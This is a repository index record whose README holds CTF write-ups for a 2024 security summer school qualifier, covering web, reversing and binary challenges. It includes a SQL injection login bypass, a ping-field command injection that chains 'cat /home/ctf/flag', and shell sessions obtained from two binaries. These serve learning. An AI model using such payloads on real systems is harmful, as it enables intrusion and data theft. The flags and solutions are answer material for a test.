{"id":19972761,"url":"https://github.com/ahossu/sss_qualifiers_v11","last_synced_at":"2026-03-04T07:31:59.095Z","repository":{"id":244681617,"uuid":"797607145","full_name":"ahossu/SSS_Qualifiers_v11","owner":"ahossu","description":"The write-ups for the preselection exam of the SSS Security Summer School at UNSTB, Romania, 2024 Edition.","archived":false,"fork":false,"pushed_at":"2024-05-12T14:47:35.000Z","size":48,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-01T18:27:03.396Z","etag":null,"topics":["binary-exploitation","ctf","ctf-challenges","ctf-platform","ctf-writeups","cyber-security","cybersecurity","pwn","pwntools","reverse-engineering","web","web-security"],"latest_commit_sha":null,"homepage":"https://security.cs.pub.ro/summer-school/wiki/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ahossu.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-05-08T07:05:58.000Z","updated_at":"2024-06-16T15:52:22.000Z","dependencies_parsed_at":"2024-06-16T18:27:22.960Z","dependency_job_id":"1fcc7e8b-d2f2-40b4-ab86-fc61dabcec2e","html_url":"https://github.com/ahossu/SSS_Qualifiers_v11","commit_stats":null,"previous_names":["ahossu/sss_qualifiers_v11"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/ahossu/SSS_Qualifiers_v11","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v11","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v11/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v11/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v11/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ahossu","download_url":"https://codeload.github.com/ahossu/SSS_Qualifiers_v11/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ahossu%2FSSS_Qualifiers_v11/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30075427,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-04T05:31:57.858Z","status":"ssl_error","status_checked_at":"2026-03-04T05:31:38.462Z","response_time":59,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["binary-exploitation","ctf","ctf-challenges","ctf-platform","ctf-writeups","cyber-security","cybersecurity","pwn","pwntools","reverse-engineering","web","web-security"],"created_at":"2024-11-13T03:09:08.384Z","updated_at":"2026-03-04T07:31:59.073Z","avatar_url":"https://github.com/ahossu.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# SSS_Qualifiers_v11\n\n##### 2024 Edition\n\n### 1. Web: Qualifiers: In Your Face\n  Link: http://141.85.224.116:8085/.\n\n  Inspecting the page the following comment appears: ```\u003c!-- U1NTe2NhZ2VfdHJhdm9sdGF9Cg== --\u003e```.\n  \n  To decrypt the message: ```$ echo U1NTe2NhZ2VfdHJhdm9sdGF9Cg== | base64 -d```.\n\n  The flag is: ```SSS{cage_travolta}```.\n\n### 2. Web: Qualifiers: Welcome\n  Link: http://141.85.224.116:8081/.\n  Inspecting the page the following part of the site is revealed: ```static/css/main.css```.\n  \n  This page has the following comment: ```/* The first part of the flag is: \"FFF{rirel_\" */```.\n  \n  When inspecting the main page appears:\n  ```\u003cp style=\"margin-top:0;display:inline;float:left\"\u003eHere is the second part of the flag:\u003c/p\u003e```\n```\u003cp id=\"hidden\" style=\"margin-left:5px;display:inline:float:right\"\u003esvyr_\u003c/p\u003e```.\n  \n  In the following code I found another page:\n  ```\n  \u003cscript type=\"text/javascript\" language=\"javascript\"\u003e  \n    var versionUpdate = (new Date()).getTime();  \n    var script = document.createElement(\"script\");  \n    script.type = \"text/javascript\";  \n    script.src = \"/static/hidden.js?v=\" + versionUpdate;  \n    document.body.appendChild(script);  \n\u003c/script\u003e \n```\n\n  In ```/static/hidden.js?v=``` I found: ```The third part of the flag is: \"unf_```\n  \n  The last part of the flag is in this hidden image: ```\u003cP id=\"invisible\"\u003e\u003cimg src=\"static/logo.png\") }}\"\u003e\u003c/P\u003e``` and we find: ```srryvatf```.\n  \n  Combining this parts of the flag it results: ```FFF{rirel_svyr_unf_srryvatf}```.\n  \n  After this I observed that the letters are shifted and I used [ROT13](https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,false,13)\u0026input=RkZGe3JpcmVsX3N2eXJfdW5mX3Nycnl2YXRmfQ) to find the final flag.\n  \n  The flag is: ```SSS{every_file_has_feelings}```.\n\n### 3. Web: Qualifiers: Cake\n  Link: http://141.85.224.116:8086/.\n\n  I inspected the page and I found a cookie named 'FLAG' and after modifying it's value from 'empty' to 'applepie'.\n  \n  I refreshed the page and the value of the 'FLAG' cookie became ```SSS%7Bhansel_gretel%7D```.\n\n  The flag is: ```SSS{hansel_gretel}```.\n\n### 4. Web: Qualifiers: Sequel Pro\n  Link: http://141.85.224.116:8083/index.php.\n\n  As the name of the task suggests, this challange is about: [SQL Injection for Login](https://www.sqlinjection.net/login/).\n\n  We need to use ```admin``` user and ```wrongpassword' OR 'a'='a``` as password for logging in.\n  \n  The flag is ```SSS{yummy_and_nutritious}```.\n\n### 5. Binary: Qualifiers: One by One\n  After opening the binary in Ghidra I discovered:\n  ```\n                             part20\n        00601038 64              undefined1 64h\n                             part0\n        00601039 53              undefined1 53h\n                             part24\n        0060103a 6f              undefined1 6Fh\n                             part18\n        0060103b 6f              undefined1 6Fh\n                             part3\n        0060103c 7b              undefined1 7Bh\n                             part27\n        0060103d 7d              undefined1 7Dh\n                             part11\n        0060103e 6f              undefined1 6Fh\n                             part13\n        0060103f 5f              undefined1 5Fh\n                             part23\n        00601040 6c              undefined1 6Ch\n                             part12\n        00601041 66              undefined1 66h\n                             part14\n        00601042 74              undefined1 74h\n                             part21\n        00601043 5f              undefined1 5Fh\n                             part9\n        00601044 70              undefined1 70h\n                             part26\n        00601045 6b              undefined1 6Bh\n                             part17\n        00601046 5f              undefined1 5Fh\n                             part25\n        00601047 63              undefined1 63h\n                             part15\n        00601048 68              undefined1 68h\n                             part6\n        00601049 63              undefined1 63h\n                             part7\n        0060104a 68              undefined1 68h\n                             part22\n        0060104b 62              undefined1 62h\n                             part2\n        0060104c 53              undefined1 53h\n                             part8\n        0060104d 69              undefined1 69h\n                             part5\n        0060104e 5f              undefined1 5Fh\n                             part19\n        0060104f 6c              undefined1 6Ch\n                             part4\n        00601050 61              undefined1 61h\n                             part16\n        00601051 65              undefined1 65h\n                             part1\n        00601052 53              undefined1 53h\n                             part10\n        00601053 5f              undefined1 5Fh\n  ```\n  I combined the parts and the result is: ```0x53 0x53 0x53 0x7B 0x61 0x5F 0x63 0x68 0x69 0x70 0x5F 0x6F 0x66 0x5F 0x74 0x68 0x65 0x5F 0x6F 0x6C 0x64 0x5F 0x62 0x6C 0x6F 0x63 0x6B 0x7D```.\n\n  I took the hex values and I [transformed](https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')\u0026input=MHg1MyAweDUzIDB4NTMgMHg3QiAweDYxIDB4NUYgMHg2MyAweDY4IDB4NjkgMHg3MCAweDVGIDB4NkYgMHg2NiAweDVGIDB4NzQgMHg2OCAweDY1IDB4NUYgMHg2RiAweDZDIDB4NjQgMHg1RiAweDYyIDB4NkMgMHg2RiAweDYzIDB4NkIgMHg3RA) them in ASCII characters.\n  \n  The flag is: ```SSS{a_chip_of_the_old_block}```.\n\n### 6. Binary: Qualifiers: Black Hole\n  I opened the file in Ghidra.\n\n  I saw that the flag is printed in ```/dev/null```, but I was unable to read it, so I modifiend in Ghidra the path to ```/tmp/sss``` and I exported the new program.\n\n  Than, I runned the program and I verified if ```/tmp/sss``` file had the flag inside.\n\n  The flag is: ```SSS{the_more_you_look_the_less_you_actually_see}```.\n  \n### 7. Web: Qualifiers: IP Destroyer\n  Link: http://141.85.224.116:8084/.\n\n  As it works like: ping 'our input', our input can contain ';' with allows us to send more commands.\n\n  After searching a lot in directories I found 'ctf' folder in '/home' directory, which has 'flag' file inside.\n  \n  I gave the following input: ```-c 0 8.8.8.8; cat /home/ctf/flag``` to read 'flag' file.\n\n  The flag is: ```SSS{hey_man_stop_pinging_around}```.\n\n### 8. Binary: Qualifiers: Mirror Me\n  I opened the binary in Ghidra and I saw that the condition ```if (lVar3 == iVar2 * iVar1)``` must be satisfied to access a terminal using ```system(\"/bin/sh\");```.\n\n  I also saw that ```lVar3 = max_mirror();```. After analysing the functions used for calculating ```lVal3```, I decided to make my own C script to simulate this process:\n  ```\n  #include \u003cstdio.h\u003e\n  \n  int check_cond(unsigned long param_1)\n  \n  {\n    unsigned long local_30;\n    unsigned long local_20;\n    \n    local_20 = 0;\n    for (local_30 = param_1; local_30 != 0; local_30 = local_30 / 10) {\n      local_20 = local_30 % 10 + local_20 * 10;\n    }\n    return local_20 == param_1;\n  }\n  \n  \n  int main() {\n    unsigned int uVar1;\n    unsigned int uVar2;\n    int iVar3;\n    unsigned int local_24;\n    unsigned int local_20;\n    \n    uVar1 = 0;\n    for (local_24 = 999; 100 \u003c local_24; local_24 = local_24 - 1) {\n      for (local_20 = local_24; 100 \u003c local_20; local_20 = local_20 - 1) {\n        uVar2 = local_20 * local_24;\n        iVar3 = check_cond(uVar2);\n        if ((iVar3 != 0) \u0026\u0026 (uVar1 \u003c uVar2)) {\n          uVar1 = uVar2;\n        }\n      }\n    }\n    printf(\"%d\",uVar1);\n  }\n  ```\n\n  The result is: ```906609```, so ```lVal3 = 906609```.\n\n  I found 2 divisors of 906609: 3 and 302203. So, I runned:\n  ```\n  $ ./mirror_me                                                               \n  Insert the corect numbers in order to get the flag\n  3\n  302203            \n  $\n  ```\n  Now I was able to run commands in the directory of the script.\n\n  I decided to connect to the server to get the flag in a similar way:\n\n  ```\n  $ nc 141.85.224.99 31338\n  Insert the corect numbers in order to get the flag\n  ```\n  \n  ```\n  3\n  302203\n  ```\n  \n  ```\n  ls\n  bin\n  boot\n  core\n  dev\n  etc\n  home\n  lib\n  lib64\n  media\n  mnt\n  opt\n  proc\n  root\n  run\n  sbin\n  srv\n  sys\n  tmp\n  usr\n  var\n  ```\n  ```\n  cd home\n  ```\n  \n  ```\n  ls\n  ctf\n  ```\n  ```\n  cd ctf\n  ```\n  \n  ```\n  ls\n  flag\n  mirror-me\n  ```\n  \n  ```\n  cat flag\n  SSS{Mirror_mirror_on_the_wall_who_is_the_fairest_of_them_all}\n  ```\n  \n  ```\n  exit\n  ```\n\n  I found the flag in ```/home/ctf/flag```.\n\n  The flag is: ```SSS{Mirror_mirror_on_the_wall_who_is_the_fairest_of_them_all}```.\n\n### 9. Binary: Qualifiers: Not Backdoor\n  I opened the file in Ghidra and I saw a very interesting function:\n  ```\n  void FUN_004006b6(uint param_1)\n  \n  {\n    long in_FS_OFFSET;\n    ulong local_40;\n    byte local_38 [40];\n    long local_10;\n    \n    local_10 = *(long *)(in_FS_OFFSET + 40);\n    local_38[0] = 0x3c;\n    local_38[1] = 0x3c;\n    local_38[2] = 0x3c;\n    local_38[3] = 0x14;\n    local_38[4] = 0x1f;\n    local_38[5] = 0x1d;\n    local_38[6] = 0x5c;\n    local_38[7] = 0x1b;\n    local_38[8] = 0x1b;\n    local_38[9] = 0x16;\n    local_38[10] = 0x30;\n    local_38[11] = 0xc;\n    local_38[12] = 0x5f;\n    local_38[13] = 1;\n    local_38[14] = 0x19;\n    local_38[15] = 0;\n    local_38[16] = 3;\n    local_38[17] = 0x1a;\n    local_38[18] = 0x1b;\n    local_38[19] = 10;\n    local_38[20] = 0xb;\n    local_38[21] = 0x30;\n    local_38[22] = 9;\n    local_38[23] = 3;\n    local_38[24] = 0x5b;\n    local_38[25] = 8;\n    local_38[26] = 0x12;\n    local_38[27] = 0x6f;\n    for (local_40 = 0; local_40 \u003c 28; local_40 = local_40 + 1) {\n      local_38[local_40] = local_38[local_40] ^ (byte)param_1;\n    }\n    printf(\"You chose flag no. %d; Here: %s\\n\",(ulong)param_1,local_38);\n    if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {\n                      /* WARNING: Subroutine does not return */\n      __stack_chk_fail();\n    }\n    return;\n  }\n  ```\n\n  The function ```FUN_004008a1``` calls the previonus function:\n  ```\n    undefined8 FUN_004008a1(int param_1,long param_2)\n  \n  {\n    int iVar1;\n    \n    if (param_1 == 2) {\n      iVar1 = atoi(*(char **)(param_2 + 8));\n      FUN_004006b6(iVar1);\n      return 0;\n    }\n    FUN_004007af();\n                      /* WARNING: Subroutine does not return */\n    exit(1);\n  }\n```\n\n  As it is unclear what values have param_1 and param_2, I've written the following script to test a huge number of possible values for param_1 and param_2:\n```\n  #include \u003cstdio.h\u003e\n\n  int main(){\n      \n    int i;\n    \n    for (i = 0; i \u003c 10000; i++) {\n        \n        int param_1 = i;    \n      \n        unsigned long local_40;\n        char local_38 [40];\n        long local_10;\n        \n        local_38[0] = 0x3c;\n        local_38[1] = 0x3c;\n        local_38[2] = 0x3c;\n        local_38[3] = 0x14;\n        local_38[4] = 0x1f;\n        local_38[5] = 0x1d;\n        local_38[6] = 0x5c;\n        local_38[7] = 0x1b;\n        local_38[8] = 0x1b;\n        local_38[9] = 0x16;\n        local_38[10] = 0x30;\n        local_38[11] = 0xc;\n        local_38[12] = 0x5f;\n        local_38[13] = 1;\n        local_38[14] = 0x19;\n        local_38[15] = 0;\n        local_38[16] = 3;\n        local_38[17] = 0x1a;\n        local_38[18] = 0x1b;\n        local_38[19] = 10;\n        local_38[20] = 0xb;\n        local_38[21] = 0x30;\n        local_38[22] = 9;\n        local_38[23] = 3;\n        local_38[24] = 0x5b;\n        local_38[25] = 8;\n        local_38[26] = 0x12;\n        local_38[27] = 0x6f;\n        \n        for (local_40 = 0; local_40 \u003c 0x1c; local_40 = local_40 + 1) {\n          local_38[local_40] = local_38[local_40] ^ (char)param_1;\n        }\n        \n        if (local_38[0] == 'S')\n          printf(\"You chose flag no. %lld; Here: %s\\n\", (long long)param_1,local_38);\n        \n    }\n  }\n  ```\n  The output of the program is:\n  ```\n  You chose flag no. 111; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 367; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 623; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 879; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 1135; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 1391; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 1647; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 1903; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 2159; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 2415; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 2671; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 2927; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 3183; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 3439; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 3695; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 3951; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 4207; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 4463; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 4719; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 4975; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 5231; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 5487; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 5743; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 5999; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 6255; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 6511; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 6767; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 7023; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 7279; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 7535; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 7791; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 8047; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 8303; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 8559; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 8815; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 9071; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 9327; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 9583; Here: SSS{pr3tty_c0nvoluted_fl4g}\n  You chose flag no. 9839; Here: SSS{pr3tty_c0nvoluted_fl4g}\n\n.  ..Program finished with exit code 0\n  ```\n\n  The final flag is: ```SSS{pr3tty_c0nvoluted_fl4g}```.\n\n### 10. Binary: Qualifiers: Pinpoint\n  I opened in Ghidra and I analysed the binary with GDB.\n  \n  As we wat to get to ```system(\"/bin/sh\");```, it is clear that the input is related with the ```v``` variable, which has the address: ```00601058```.\n  \n  The input is integer, so ```00601058``` in integer is ```6295640```.\n  \n  The following input will be related with ```0x5358535```, but the variable already has ```0x5358535```.\n  \n  As the input accepts only two bytes, I thought it will be ```0x2020```, but after this I saw in IDA PRO that only one byte will be used.\n  \n  Than I used ```6295640``` and ```0x20``` as input. After this, I found out that we need also an integer as second input.\n  \n  I used the following input: ```6295640``` and ```88```. After this I saw in GDB that the address I was writing was wrong.\n  \n  As I need to write to a futher possision in the momory to get the ```0x5358535```, I tried to inscrease the address. Using ```6295642``` and ```88``` as input worked, because I need to write to the third byte of the integer that has four bytes.\n  \n  This is the code with the interaction with the server:\n  ```\n  $ nc 141.85.224.99 31337\n  \n  address to write to: 6295642\n  value to write: 88\n  \n  ls\n  \n  bin\n  boot\n  core\n  dev\n  etc\n  home\n  lib\n  lib64\n  media\n  mnt\n  opt\n  proc\n  root\n  run\n  sbin\n  srv\n  sys\n  tmp\n  usr\n  var\n  \n  cd home\n  \n  ls\n  \n  ctf\n  \n  cd ctf\n  \n  ls\n  \n  flag\n  pinpoint\n  \n  cat flag\n  \n  SSS{aim_for_the_kill}\n  \n  exit\n  ```\n  \n  The final flag is: ```SSS{aim_for_the_kill}```.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fahossu%2Fsss_qualifiers_v11","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fahossu%2Fsss_qualifiers_v11","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fahossu%2Fsss_qualifiers_v11/lists"}